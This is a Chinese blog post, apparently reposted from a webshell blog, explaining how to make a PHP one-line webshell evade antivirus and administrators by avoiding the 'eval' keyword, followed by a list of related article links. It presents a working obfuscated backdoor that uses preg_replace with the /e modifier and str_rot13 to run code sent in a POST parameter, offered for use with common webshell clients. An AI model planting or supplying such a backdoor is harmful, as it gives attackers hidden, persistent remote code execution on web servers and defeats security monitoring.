这年头留个php一句话木马,随便就被杀了,但具我所知,杀软和运维人员杀的都是eval函数的关键字,只要避开关键字就能延长木马的寿命,但要怎么避开呢?

首先我想到的是将eval从字符串类型赋给一个变量。

如:$func = 'phpinfo';

$func();

这样的确是可以运行phpinfo()的,但是eval却不能通过这样来执行,我马上又想到了assert函数,他有着类似eval的功能,但效果并不理想,完全没有eval用着爽,而且也是公开了的,所以我也就将他放弃了。

还记得《20 Ways to Fuzzing PHP Source Code》里提到的preg_replace代码执行漏洞吗?

没错,利用preg_replace的模式修饰符e(PREG_REPLACE_EVAL)就可以将替换后的字符串作为php代码评估运行(eval函数方式)。

既然是将字符串作为php代码评估运行,哪么完全可以替换或者转码一下eval,这样就可以避开关键字了。

我的一句话木马如下:

($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');

使用上跟原来的一句话没有区别,可用常用的客户端连接密码b4dboy。

str_rot13('riny')即编码后的eval,完全避开了关键字,又不失效果。

转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/3202.html

shell 免杀aspx_避开eval关键字,打造免杀一句话木马相关推荐

  1. php eval一句话木马干啥的,eval函数简介与PHP一句话木马剖析

    eval函数简介与PHP一句话木马剖析 大家好我是Carol,我的QQ是:906871417 一:eval函数 1.eval()函数把字符串按照PHP代码来计算. 2.该字符串必须是合法的PHP代码, ...

  2. php assert eval,代码执行函数之一句话木马

    前言 大家好,我是阿里斯,一名IT行业小白.非常抱歉,昨天的内容出现瑕疵比较多,今天重新整理后再次发出,修改并添加了细节,另增加了常见的命令执行函数如果哪里不足,还请各位表哥指出. eval和asse ...

  3. 远程包含shell时,上传shell时所遇到一句话木马不能上传问题解决的办法(这里为单引号与双引号问题)

    远程包含shell 需要allow_url_open=On,才可以尝试远程包含一句话木马: http://www.xxx.com/echo.txt, 代码如下. <?php fputs (fop ...

  4. MSF模拟渗透测试之一句话木马拿shell

    MSF模拟渗透测试之一句话木马拿shell 文章目录 MSF模拟渗透测试之一句话木马拿shell 前言 一.利用命令执行漏洞,生成一句话木马文件 二.利用一句话木马拿shell 1.复制当前网址到蚁剑 ...

  5. shell 免杀aspx_对于asp免杀webshell的一些总结

    0x00 前言 现在asp不多但是还是有,还是写一篇文章来简单的介绍下asp的免杀吧,相对于php我们的asp还是不够灵活,其中一些思路参考于LandGrey的文章 偷偷介绍下公众号:404安全 0x ...

  6. 科迅免杀php一句话_谈谈php一句话木马的免杀

    文章最后更新时间为:2019年07月05日 00:17:52 一句话木马叱咤江湖这么多年还是如此活跃,我个人理解是,方便,相比于二进制后门或者大马,一句话木马足够短,容易上传,并且有众多客户端,菜刀, ...

  7. php后门绕过eval关键字,一些变态的PHP一句话后门收集

    这类后门让网站.服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的.今天我们细数一些有意思的PHP一句话木马. 利用404页面隐藏PHP小马 ...

  8. PHP一句话木马免杀(通过VirusTotal测试)

    PHP一句话木马免杀 仅用于学习与交流,请勿用于非法用途!!! 简介与思路 免杀技术全称为反杀毒技术Anti Anti- Virus简称"免杀",它指的是一种能使病毒木马免于被杀毒 ...

  9. PHP一句话木马免杀学习

    PHP一句话木马免杀学习 简单了解php一句话木马原理 <?php @eval($_POST['shell']);?> 首先存在一个名为shell的变量,shell的取值为HTTP的POS ...

最新文章

  1. 看一遍就理解:MVCC原理详解
  2. java函数定义的要素_Java学习笔记八(方法)
  3. Office 365 Exchange 2016 混合部署前准备
  4. 不是keys,记一次因 redis 使用不当导致应用卡死 的过程
  5. 余额宝升级,限额限时解除,以后再也不用定闹钟抢破头了!
  6. 中小企业SaaS型软件BI的发展前景
  7. Arctic Network UVA - 10369 (最小生成树,适合prim)
  8. LeetCode-9.回文数(大括号+双目运算符使用)
  9. Oracle 11g及PLSQL可视化界面的安装与使用(内附软件)
  10. 技嘉服务器主板装系统,技嘉主板bios设置图解教程
  11. 概率逗号分号_分号的用法 和逗号的区别
  12. NOI2015 小园丁与老司机
  13. KNN(K临近算法)的简单模拟实现
  14. Tangents UVA - 10674 (求两个圆公切线的切点)
  15. 华为中兴为何对未来信心十足?
  16. 考研英国文学复习要点
  17. 2021年五一赛A题-疫苗生产优化问题
  18. faker和劫的图片_faker劫反杀ryu第一视角完整视频和gif,慢动作回放两个劫之间的较量分析...
  19. 6.087 Practical Programming in C, lec10
  20. (网络实验)基于Jnetpcap的网络嗅探器(抓包程序)设计与实现

热门文章

  1. 软件测试用例篇(2)
  2. php 纯英文单词数,推荐几个在线测试英语单词量的网站
  3. 无字天书之Python第八页(基础数结构—下)
  4. Mybatis 逆向工程代码
  5. 实现用户手机流量统计(ReduceTask并行度控制)
  6. SOLIDWORKS装配配合技巧
  7. SAX(Symbolic Aggregate Approximation)一种时间序列的新型符号化方法
  8. Python 微博奔驰事件爬虫
  9. 视频防止盗链的方法解析
  10. rtsp协议报文解析-首部字段解析